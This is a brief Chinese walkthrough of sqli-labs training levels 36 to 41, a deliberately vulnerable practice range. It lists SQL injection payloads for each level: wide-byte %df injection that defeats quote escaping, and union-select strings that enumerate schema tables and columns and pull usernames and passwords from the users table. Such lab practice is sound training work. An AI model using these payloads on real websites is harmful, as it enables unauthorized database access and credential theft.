sqli-labs靶场less36-less40
less36
1.我们打开靶场之后打开来看一下,输入的内容会被转义,依旧是宽字节注入
2.使用以下宽字节注入,使用的是%df
?id=-1%df%27%20union%20select%201,database(),3--+
3.剩余内容与前面关卡基本一样,只要使用上面的方法合成宽字节即可
less37
1.我们打开靶场之后打开来看一下,它依旧告诉我们输入的内容会被转义,且有登录框
2.我们可以看到需要进行抓包,然后就可以在数据包里面输入以下语句,我们依旧使用%df进行转义
?id=-1%df%27%20union%20select%201,database(),3--+
3.剩余的内容与之前一样,做法与上面相同
less38
1.我们打开靶场之后打开来看一下
2.这一关我们可以使用联和注入来做,语句如下
?id=-1' union select 1,2,3--+
?id=-1' union select 1,2,database()--+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1' union select 1,2,group_concat(username,password) from users--+
less39
1.我们打开靶场之后打开来看一下
2.我们可以继续使用联合注入来做,不过闭合方式为数字型的,语句如下
?id=-1 union select 1,2,3--+
3.方法和上面一样,语句与上一关基本一样
less40
1.我们打开靶场之后打开来看一下
2.这一关和上一关一样,不过是字符型,闭合方式为‘),语句如下
?id=1')union select 1,2,3--+
3.其余内容除闭合方式外和上一关一样
less41
1.这一关和39关一样为数字型注入
?id=-1 union select 1,2,3--+
2.其余做法和39关一样